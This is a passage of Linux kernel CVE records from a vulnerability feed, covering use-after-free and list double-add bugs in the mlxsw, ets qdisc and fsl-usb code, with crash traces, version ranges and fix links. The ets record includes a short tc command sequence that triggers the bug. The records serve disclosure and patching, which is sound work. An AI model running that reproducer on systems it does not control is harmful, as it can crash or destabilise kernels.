entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:13.200Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a2dfe6758fc63e542105bee8b17a3a7485684db0"
},
{
"url": "https://git.kernel.org/stable/c/9e0a0d9eeb0dbeba2c83fa837885b19b8b9230fc"
},
{
"url": "https://git.kernel.org/stable/c/c437fbfd4382412598cdda1f8e2881b523668cc2"
},
{
"url": "https://git.kernel.org/stable/c/4a3c569005f42ab5e5b2ad637132a33bf102cc08"
},
{
"url": "https://git.kernel.org/stable/c/ed8141b206bdcfd5d0b92c90832eeb77b7a60a0a"
},
{
"url": "https://git.kernel.org/stable/c/675c5aeadf6472672c472dc0f26401e4fcfbf254"
},
{
"url": "https://git.kernel.org/stable/c/8b0e69763ef948fb872a7767df4be665d18f5fd4"
}
],
"title": "mlxsw: spectrum_router: Fix neighbour use-after-free",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68801",
"datePublished": "2026-01-13T15:29:10.349Z",
"dateReserved": "2025-12-24T10:30:51.045Z",
"dateUpdated": "2026-01-19T12:19:13.200Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68815 (GCVE-0-2025-68815)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
net/sched: ets: Remove drr class from the active list if it changes to strict
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: ets: Remove drr class from the active list if it changes to strict
Whenever a user issues an ets qdisc change command, transforming a
drr class into a strict one, the ets code isn't checking whether that
class was in the active list and removing it. This means that, if a
user changes a strict class (which was in the active list) back to a drr
one, that class will be added twice to the active list [1].
Doing so with the following commands:
tc qdisc add dev lo root handle 1: ets bands 2 strict 1
tc qdisc add dev lo parent 1:2 handle 20: \
tbf rate 8bit burst 100b latency 1s
tc filter add dev lo parent 1: basic classid 1:2
ping -c1 -W0.01 -s 56 127.0.0.1
tc qdisc change dev lo root handle 1: ets bands 2 strict 2
tc qdisc change dev lo root handle 1: ets bands 2 strict 1
ping -c1 -W0.01 -s 56 127.0.0.1
Will trigger the following splat with list debug turned on:
[ 59.279014][ T365] ------------[ cut here ]------------
[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.
[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220
[ 59.280860][ T365] Modules linked in:
[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)
[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220
[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 <0f> 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44
...
[ 59.288812][ T365] Call Trace:
[ 59.289056][ T365] <TASK>
[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80
[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0
[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10
[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240
[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10
[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110
[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5
[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0
Fix this by always checking and removing an ets class from the active list
when changing it to strict.
[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
f517335a61ff8037b18ba1b0a002c1f82926a934 , < 58fdce6bc005e964f1dbc3ca716f5fe0f68839a2
(git)
Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < 02783a37cb1c0a2bd9fcba4ff1b81e6e209c7d87 (git) Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < 8067db5c95aab9461d23117679338cd8869831fa (git) Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < 2f125ebe47d6369e562f3cbd9b6227cff51eaf34 (git) Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < cca2ed931b734fe48139bc6f020e47367346630f (git) Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < 43d9a530c8c094d137159784e7c951c65f11ec6c (git) Affected: cd9b50adc6bb9ad3f7d244590a389522215865c4 , < b1e125ae425aba9b45252e933ca8df52a843ec70 (git) Affected: d05330672afe2e142ba97e63bd7c1faef76781bb (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sched/sch_ets.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "58fdce6bc005e964f1dbc3ca716f5fe0f68839a2",
"status": "affected",
"version": "f517335a61ff8037b18ba1b0a002c1f82926a934",
"versionType": "git"
},
{
"lessThan": "02783a37cb1c0a2bd9fcba4ff1b81e6e209c7d87",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "8067db5c95aab9461d23117679338cd8869831fa",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "2f125ebe47d6369e562f3cbd9b6227cff51eaf34",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "cca2ed931b734fe48139bc6f020e47367346630f",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "43d9a530c8c094d137159784e7c951c65f11ec6c",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"lessThan": "b1e125ae425aba9b45252e933ca8df52a843ec70",
"status": "affected",
"version": "cd9b50adc6bb9ad3f7d244590a389522215865c4",
"versionType": "git"
},
{
"status": "affected",
"version": "d05330672afe2e142ba97e63bd7c1faef76781bb",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sched/sch_ets.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.62",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.13.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:20.257Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/58fdce6bc005e964f1dbc3ca716f5fe0f68839a2"
},
{
"url": "https://git.kernel.org/stable/c/02783a37cb1c0a2bd9fcba4ff1b81e6e209c7d87"
},
{
"url": "https://git.kernel.org/stable/c/8067db5c95aab9461d23117679338cd8869831fa"
},
{
"url": "https://git.kernel.org/stable/c/2f125ebe47d6369e562f3cbd9b6227cff51eaf34"
},
{
"url": "https://git.kernel.org/stable/c/cca2ed931b734fe48139bc6f020e47367346630f"
},
{
"url": "https://git.kernel.org/stable/c/43d9a530c8c094d137159784e7c951c65f11ec6c"
},
{
"url": "https://git.kernel.org/stable/c/b1e125ae425aba9b45252e933ca8df52a843ec70"
}
],
"title": "net/sched: ets: Remove drr class from the active list if it changes to strict",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68815",
"datePublished": "2026-01-13T15:29:19.789Z",
"dateReserved": "2025-12-24T10:30:51.047Z",
"dateUpdated": "2026-01-19T12:19:20.257Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68800 (GCVE-0-2025-68800)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats
Cited commit added a dedicated mutex (instead of RTNL) to protect the
multicast route list, so that it will not change while the driver
periodically traverses it in order to update the kernel about multicast
route stats that were queried from the device.
One instance of list entry deletion (during route replace) was missed
and it can result in a use-after-free [1].
Fix by acquiring the mutex before deleting the entry from the list and
releasing it afterwards.
[1]
BUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]
Read of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043
CPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)
Hardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017
Workqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]
Call Trace:
<TASK>
dump_stack_lvl+0xba/0x110
print_report+0x174/0x4f5
kasan_report+0xdf/0x110
mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]
process_one_work+0x9cc/0x18e0
worker_thread+0x5df/0xe40
kthread+0x3b8/0x730
ret_from_fork+0x3e9/0x560
ret_from_fork_asm+0x1a/0x30
</TASK>
Allocated by task 29933:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_kmalloc+0x8f/0xa0
mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]
mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]
process_one_work+0x9cc/0x18e0
worker_thread+0x5df/0xe40
kthread+0x3b8/0x730
ret_from_fork+0x3e9/0x560
ret_from_fork_asm+0x1a/0x30
Freed by task 29933:
kasan_save_stack+0x30/0x50
kasan_save_track+0x14/0x30
__kasan_save_free_info+0x3b/0x70
__kasan_slab_free+0x43/0x70
kfree+0x14e/0x700
mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]
mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]
process_one_work+0x9cc/0x18e0
worker_thread+0x5df/0xe40
kthread+0x3b8/0x730
ret_from_fork+0x3e9/0x560
ret_from_fork_asm+0x1a/0x30
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
f38656d067257cc43b652958dd154e1ab0773701 , < b957366f5611bbaba03dd10ef861283347ddcc88
(git)
Affected: f38656d067257cc43b652958dd154e1ab0773701 , < 6e367c361a523a4b54fe618215c64a0ee189caf0 (git) Affected: f38656d067257cc43b652958dd154e1ab0773701 , < 37ca08b35a27ce8fd8e74dd3fd2ae21c23b63b73 (git) Affected: f38656d067257cc43b652958dd154e1ab0773701 , < 5f2831fc593c2b2efbff7dd0dd7441cec76adcd5 (git) Affected: f38656d067257cc43b652958dd154e1ab0773701 , < 216afc198484fde110ebeafc017992266f4596ce (git) Affected: f38656d067257cc43b652958dd154e1ab0773701 , < 4049a6ace209f4ed150429f86ae796d7d6a4c22b (git) Affected: f38656d067257cc43b652958dd154e1ab0773701 , < 8ac1dacec458f55f871f7153242ed6ab60373b90 (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b957366f5611bbaba03dd10ef861283347ddcc88",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "6e367c361a523a4b54fe618215c64a0ee189caf0",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "37ca08b35a27ce8fd8e74dd3fd2ae21c23b63b73",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "5f2831fc593c2b2efbff7dd0dd7441cec76adcd5",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "216afc198484fde110ebeafc017992266f4596ce",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "4049a6ace209f4ed150429f86ae796d7d6a4c22b",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
},
{
"lessThan": "8ac1dacec458f55f871f7153242ed6ab60373b90",
"status": "affected",
"version": "f38656d067257cc43b652958dd154e1ab0773701",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:11.928Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b957366f5611bbaba03dd10ef861283347ddcc88"
},
{
"url": "https://git.kernel.org/stable/c/6e367c361a523a4b54fe618215c64a0ee189caf0"
},
{
"url": "https://git.kernel.org/stable/c/37ca08b35a27ce8fd8e74dd3fd2ae21c23b63b73"
},
{
"url": "https://git.kernel.org/stable/c/5f2831fc593c2b2efbff7dd0dd7441cec76adcd5"
},
{
"url": "https://git.kernel.org/stable/c/216afc198484fde110ebeafc017992266f4596ce"
},
{
"url": "https://git.kernel.org/stable/c/4049a6ace209f4ed150429f86ae796d7d6a4c22b"
},
{
"url": "https://git.kernel.org/stable/c/8ac1dacec458f55f871f7153242ed6ab60373b90"
}
],
"title": "mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68800",
"datePublished": "2026-01-13T15:29:09.688Z",
"dateReserved": "2025-12-24T10:30:51.044Z",
"dateUpdated": "2026-01-19T12:19:11.928Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68781 (GCVE-0-2025-68781)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
VLAI?
EPSS
Title
usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: phy: fsl-usb: Fix use-after-free in delayed work during device removal
The delayed work item otg_event is initialized in fsl_otg_conf() and
scheduled under two conditions:
1. When a host controller binds to the OTG controller.
2. When the USB ID pin state changes (cable insertion/removal).
A race condition occurs when the device is removed via fsl_otg_remove():
the fsl_otg instance may be freed while the delayed work is still pending
or executing. This leads to use-after-free when the work function
fsl_otg_event() accesses the already freed memory.
The problematic scenario:
(detach thread) | (delayed work)
fsl_otg_remove() |
kfree(fsl_otg_dev) //FREE| fsl_otg_event()
| og = container_of(...) //USE
